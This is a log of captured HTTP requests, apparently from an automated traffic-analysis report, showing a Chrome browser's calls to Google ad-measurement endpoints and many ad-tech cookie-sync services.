              Source: global trafficHTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaSlXYrtDuu4pAJLur9Ub7fKrWLtJq0XiZy1q4NDaN8Rfcv23oFmtaozMUOehwQh26-ih-zXtEMC6NlEgBM1zyLKhoFM_w HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaQdsNBo9WRTFG5NvmpTSV1NED_cHunzkusyqhhJ8wsHTvFR9ycGSGsL-T38B7ZwdJYBS7dgA391Exs0qr0ZBQUJ4_OAxg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /i/ca-pub-9495854422341365?href=https%3A%2F%2Ftrksyln.net%2FError&ers=2 HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /t/v2/sync?tagid=V2_4531&src.visitorid=CAESEF9fyWZJ8RKws_tJ1qGsPfA&google_push=AXcoOmR4H2VfDZB2KNV09WyzX4pnuC39urG3o7HFxj9XXoEoU4DPWDgCGNwoygQN3Mr9g8i_oN8U9qlhz3zZEvnu_wfoP_GQkTanpUQ&google_cver=1 HTTP/1.1Host: odr.mookie1.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pagead/drt/ui HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sync?id=10&google_gid=CAESELZvmPR7DxJls1q5vUVneqI&google_cver=1&google_push=AXcoOmTOEF9Y8fogjEB4TqPOvFToDFSNcqrrOe7PA0KGyHSr7lsEvHJLWXoidRqi6SOq-7TG1-HqyFGdK2rWPeFjmNw3z3TgjDyQdg HTTP/1.1Host: sync2-dsp.e-volution.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /d/sync/cookie/generic?https://cm.g.doubleclick.net/pixel?google_nid=adelphic_mobile&google_gid=CAESEFdi1-RiPfWOI2CLRzbOGh8&google_cver=1&google_push=AXcoOmRs--NX_amzQoFfaVNg5QoiiG0PbKRUiH2xlJkIPOhaYBZjwU9VO-TZql-FDrFlnoZ8M75CK8ZQ9kFGCZP5OX1boLe0fbMXAQ&google_hm=${ADELPHIC_CUID_B64} HTTP/1.1Host: sync.ipredictive.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sync?exchange=11&google_gid=CAESEEsdtE4SKtYWVNPeVuWOY-c&google_cver=1&google_push=AXcoOmSt6_labGwG7eZ_989UtFK9wsaMAzKlKq1YttCVRXJ4tJ7NNPhWGVLSYuXx1V87z2xqKNZZQWX1Dv1IKIrsa3-8sxKvqRw_lA HTTP/1.1Host: dsp.adkernel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /api/adx/cm/pixel?google_gid=CAESEPW3MUN8tvNLNoJsiPIpkO8&google_cver=1&google_push=AXcoOmRTXTUn1Pr6awWAnQRPgchY6LBTD7UWgfftnoBHloxfG5GmoNInKY9_iM4LiUT3GONf9BhydenY40DkAIQfixnY9Gu6A9hJZS1O HTTP/1.1Host: www.temu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /f/AGSKWxXE0rdt5cwklf9PRBqqi8rFncdilTmLVYbRCmgcYEIr_h6aXnlDVbYl8-Mw69k26WrMfK2ANMfR9tO7b_s5NhLr9ZNkM_vAqZxxWuutweCz4t4EvQ7RPeu7lVUr28c-H-5-bioZAg==?fccs=W251bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLFsxNzMwMzk4NzcyLDU3NDAwMDAwMF0sbnVsbCxudWxsLG51bGwsW251bGwsWzcsNl0sbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsbnVsbCxudWxsLG51bGwsMV0sImh0dHBzOi8vdHJrc3lsbi5uZXQvRXJyb3IiLG51bGwsW1s4LCJZc2dPT2N0dWtySSJdLFs5LCJlbi1VUyJdLFsxOSwiMiJdLFsxNywiWzBdIl0sWzE4LCJbW1sxXV1dIl1dXQ HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://trksyln.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sync?exchange=11&google_gid=CAESEDdTD-hSLjZJhPlP3FuVp9M&google_cver=1&google_push=AXcoOmSt1m7rF-4iFBqUxfNrh9kLkm2l2-27NM6ylpVM1BbGfx988rXg5S47kzFlUujGYJTCJlkITmT_GbciUFrM5Au3IbUbXt8y HTTP/1.1Host: dsp.adkernel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /bh/rtset?pid=559960&gp=1&google_gid=CAESEC6PH-lvJoYH9V_-6nwhMus&google_cver=1&google_push=AXcoOmQHW3Senmpk8tpcaDaCAkasoYHxB1QL3vzrRn4MuUN_wlYAkuh8f5ngrgzRfD_4zBEpSvzZMxzLE6FJ02A6qXPBh-8n3s0ad4A9 HTTP/1.1Host: bh.contextweb.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /match/47/?remote_uid=CAESEA_YaeSFRZgNp7ugVZyanQk&c_param1=AXcoOmQJjBajovnqSJhcnjB8OznNBMIfG7StGCCKjvywNcFSn6R5uJC5Ake0ACufry6wJvOvysfECv7eIsLmnMa4auWPPgivRfRT0PA&gdpr=%%GDPR%%&addtl_consent=%%ADDTL_CONSENT%%&google_cver=1 HTTP/1.1Host: s.uuidksinc.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sync?nid=154&google_gid=CAESEHWbVka7PFDHpdWk2787PTM&google_cver=1&google_push=AXcoOmRyI8F21-Wg9-ClV_GMcSKS-JEdK8e0hNkNpUxrM_9_KTEJg_mGuqLEG93DCe1MxNcb1YG8zgga00vYgS2qswEdwz2nZ6Ibdw HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /gp_match?google_gid=CAESEEQQDa5m7sjciSE7Ndvm-Qs&google_cver=1&google_push=AXcoOmSIhx_awINzXgzYWs7Ldkdetu8Y-SBwDodzM3mFTtUbrbhkp0OS6hSo2f96raiQfkDC1lzy9png7PoLVky3HNMKBXYnTJqxnD8 HTTP/1.1Host: um.simpli.fiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cookie-sync/adx?google_gid=CAESENLpOVFDHsC-VfNLaLRul-w&google_cver=1&google_push=AXcoOmRCFB4RRBFgylxbOFqFBPjZeDvCs7GKRvkfHQCCMWA8xyYRxGIyqTtHvnHsOhTFPNWwGBpagrnbCD1tYp2Fb3NXZOXDekx5 HTTP/1.1Host: match.prod.bidr.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sync?nid=154&google_gid=CAESEOhl-PvFg9cy4oKnILke398&google_cver=1&google_push=AXcoOmRtdCb-MvIoLYG0BLsM4ImCpoRrxKqAbDTAIJV5X2WKmBHF96QTkDLW4_9rU_cVAa9PlVl7JS_w5IFmJvCMk_9EQJFv2n-HLvp_ HTTP/1.1Host: sync.srv.stackadapt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pagead/drt/ui HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaR80l8t9U7n9gXPOfu3w6UyLAl3cik-0i5KBcl3_ssI2Gtx2spmIdHhFx9UzfMiFWCsz14vmro9J-xO4PKboOMcIXp8MA HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sync?id=10&google_gid=CAESEMDhonF9Btdu1XWfNJz5fhA&google_cver=1&google_push=AXcoOmSVgF44yqfpd96VbFVh_KjAPRPC4Ai_8ZtMMIn9azfRglCI6xaLv6qNovrTM_6iJz8pWP9tCIBnejjHjsYUA-2q3qq8sZJAfaeuHw HTTP/1.1Host: sync2-dsp.e-volution.aiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: production=42792e3cde3b100032f83ab40466
              Source: global trafficHTTP traffic detected: GET /api/adx/cm/pixel?google_gid=CAESENYT61gwLXGsOhmLZBLf7tE&google_cver=1&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q HTTP/1.1Host: www.temu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /sync?exchange=11&google_gid=CAESEBNhaeuSmOpsq07SBs2IyhE&google_cver=1&google_push=AXcoOmTePKwToHaeIQGu8M56gWDzY-1geiWnlUHfQIpsbYld60Ki_rzZaP9OaIWvTKZwgr332ljGgxcxDcFPggPWRaGld0nzhuAzAeO9 HTTP/1.1Host: dsp.adkernel.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADK_EX_11=1; ADKUID=A8836978867793438466
              Source: global trafficHTTP traffic detected: GET /dis/usersync.aspx?r=4&p=14&cp=google&cu=1&url=https%3A%2F%2Fcm.g.doubleclick.net%2Fpixel%3Fgoogle_nid%3Dcjp%26google_hm%3D%40%40CRITEO_USERID%40%40%26google_push%3DAXcoOmQ1NvIkBuiezRP4VyO1tot_Yk-dOVvINUBM4mZHt7YSmwC9oik7a2vt6010qe8UdTECB7DIt_PBPnp2mLudoQCl_f0ZmP97TYXp&google_gid=CAESEBG-T-imfgN0jPbZ2bYvkgg&google_cver=1 HTTP/1.1Host: dis.criteo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ju/cs/google?google_gid=CAESEI1qM-uapk6ijqCEkmvquJE&google_cver=1&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g HTTP/1.1Host: gtrace.mediago.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /gp_match?google_gid=CAESEAH4BonoisDzvjD0eD3Gsmw&google_cver=1&google_push=AXcoOmSsQrt-_qiBrr6OIHfpWMD-3_UYpvvZqW8G6sH9gjdwVNowHfTsgvspPMInOQti-TkQ0oB5OJiwg4bv4pExTTZs6MqwMVAtC6Uq HTTP/1.1Host: um.simpli.fiConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cookie-sync/adx?google_gid=CAESEDiYK4sqMzOUbRWTRd1nDCw&google_cver=1&google_push=AXcoOmTo2EAoqgbbw2Cb7fAUVP11_HvIEeWtIz6kljuEJPQ-1zPelC1FFe0JAUhRlBsW8tvUPC7tKMRWC2hCdktOiSxuOb6V8OXC1zof HTTP/1.1Host: match.prod.bidr.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /track/cmf/google?google_gid=CAESELJu5-7ezmiSZQVy8-_oFDQ&google_cver=1&google_push=AXcoOmRx0KuDS_5o9Zy6vJW0KAWcooCxdmf_izsR3SRJiVhg6QBKvaasyHJxXO09-1UoZ8_V-EKFl_9_C3vcmkaDrVzPGOLrd9VN9N3E HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pagead2.googlesyndication.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ads/measurement/l?ebcid=ALh7CaT6FXIFvZW0DewpsEqJBJb-MJQr7sID113NOOXgib0Cx-XeGuKQUcr0n_lcem5uugkeRxWKqm8lNexqlA8pQp9GUBq5lQ HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://googleads.g.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
